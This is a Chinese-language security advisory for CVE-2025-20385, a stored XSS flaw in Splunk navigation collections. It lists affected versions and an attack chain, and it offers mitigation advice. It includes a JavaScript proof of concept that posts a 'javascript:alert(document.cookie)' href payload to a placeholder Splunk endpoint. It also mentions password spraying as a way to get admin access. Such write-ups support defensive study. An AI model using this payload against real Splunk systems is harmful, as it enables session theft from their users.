CVE-2025-20385: Splunk Enterprise 导航栏Collection存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-20385

漏洞类型

存储型跨站脚本(XSS)

CVSS评分

2.4 低危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

需要交互 (UI:R)

影响产品

Splunk Enterprise, Splunk Cloud Platform

漏洞概述

CVE-2025-20385是Splunk Enterprise和Splunk Cloud Platform中的一个存储型跨站脚本(XSS)漏洞。该漏洞影响多个版本的Splunk产品，包括Enterprise 10.0.2之前、9.4.6之前、9.3.8之前和9.2.10之前的所有版本，以及Cloud Platform 10.1.2507.6之前、10.0.2503.7之前和9.3.2411.117之前的所有版本。漏洞的根本原因在于具有admin_all_objects权限的高权限用户可以在导航栏的collection中的锚点标签(anchor tag)的href属性中注入恶意JavaScript代码。当其他用户访问包含该恶意payload的页面时，浏览器会执行这些未授权的JavaScript代码，从而可能导致会话劫持、敏感信息窃取或其他客户端攻击。此漏洞需要用户交互才能触发，攻击者必须诱使受害者访问恶意构造的页面。由于漏洞评分较低(CVSS 2.4)，表明其实际危害相对有限，但仍建议及时应用安全更新。

技术细节

该漏洞属于存储型跨站脚本漏洞，攻击向量为网络路径。漏洞存在于Splunk的导航栏collection组件中，具体是在锚点标签的href属性处理上。拥有admin_all_objects权限的高权限用户可以创建或修改导航栏collection，并在此过程中注入恶意JavaScript代码到href属性中。由于这些数据会被存储在服务器端，当其他用户访问相关页面时，恶意代码会被浏览器作为正常HTML/JavaScript解析执行。攻击者可以利用此漏洞执行任意JavaScript代码，包括窃取用户会话cookie、伪造用户操作或重定向用户到钓鱼网站。CVSS向量显示该漏洞需要高权限认证(PR:H)和用户交互(UI:R)，这意味着攻击者必须先获取高权限账户，然后通过社会工程学手段诱使其他用户访问恶意页面。虽然机密性影响为低(C:L)，且没有完整性和可用性影响，但存储型XSS的持久性特征使其仍具有一定威胁。攻击者只需要一次注入即可持续影响所有访问该页面的用户。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者首先识别目标Splunk实例版本，确认其是否在受影响版本范围内

STEP 2

步骤2: 获取高权限账户

攻击者需要获取拥有admin_all_objects权限的用户账户，可通过密码喷洒、凭证填充或内部渗透等方式实现

STEP 3

步骤3: 注入恶意Payload

使用高权限账户登录Splunk，在导航栏collection的锚点标签href属性中注入恶意JavaScript代码，如javascript:alert(document.cookie)

STEP 4

步骤4: 持久化存储

恶意payload被存储在服务器端数据库中，成为导航栏collection的永久组成部分

STEP 5

步骤5: 诱导用户访问

攻击者通过社会工程学手段（如钓鱼邮件、内部消息等）诱使目标用户访问包含恶意payload的页面

STEP 6

步骤6: XSS执行

当受害用户访问该页面时，浏览器解析锚点标签的href属性并执行注入的JavaScript代码，导致会话cookie被盗或其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-20385 PoC - Splunk Stored XSS in Navigation Collection
// Requires admin_all_objects privilege

const splunkEndpoint = 'https://target-splunk.com:8089/servicesNS/nobody/search/data/ui/collections';
const authToken = 'YOUR_AUTH_TOKEN_HERE';

// Malicious payload for href attribute XSS
const maliciousPayload = {
  "collectionName": "malicious_collection",
  "entry": {
    "name": "evil_link",
    "content": {
      "href": "javascript:alert(document.cookie)",
      "label": "Click Me"
    }
  }
};

async function exploit() {
  try {
    // Step 1: Create malicious collection entry
    const createResponse = await fetch(splunkEndpoint, {
      method: 'POST',
      headers: {
        'Authorization': `Splunk ${authToken}`,
        'Content-Type': 'application/json'
      },
      body: JSON.stringify(maliciousPayload)
    });
    
    if (createResponse.ok) {
      console.log('[+] Malicious collection entry created successfully');
      console.log('[+] XSS payload injected into href attribute');
      console.log('[+] Any user viewing this collection will trigger the XSS');
    }
  } catch (error) {
    console.error('[-] Exploitation failed:', error.message);
  }
}

exploit();

影响范围

Splunk Enterprise < 9.2.10

Splunk Enterprise < 9.3.8

Splunk Enterprise < 9.4.6

Splunk Enterprise < 10.0.2

Splunk Cloud Platform < 9.3.2411.117

Splunk Cloud Platform < 10.0.2503.7

Splunk Cloud Platform < 10.1.2507.6

防御指南

临时缓解措施

对于无法立即进行版本升级的场景，建议采取以下临时缓解措施：首先，严格限制具有admin_all_objects权限的用户数量，确保只有绝对必要的用户拥有该权限；其次，启用Splunk的审计日志功能，监控所有collection相关的创建和修改操作，及时发现异常行为；第三，在浏览器端部署XSS防护措施，如启用浏览器的XSS过滤器或部署Web应用防火墙(WAF)规则来检测和拦截恶意JavaScript代码；第四，对所有具有高权限的用户账户启用多因素认证(MFA)，防止账户被入侵；最后，定期审查用户权限分配，撤销不必要的特权访问。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-20385
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-20385
3 Details https://www.cvedetails.com/cve/CVE-2025-20385/
4 VulDB https://vuldb.com/cve/CVE-2025-20385
5 Link https://advisory.splunk.com/advisories/SVD-2025-1204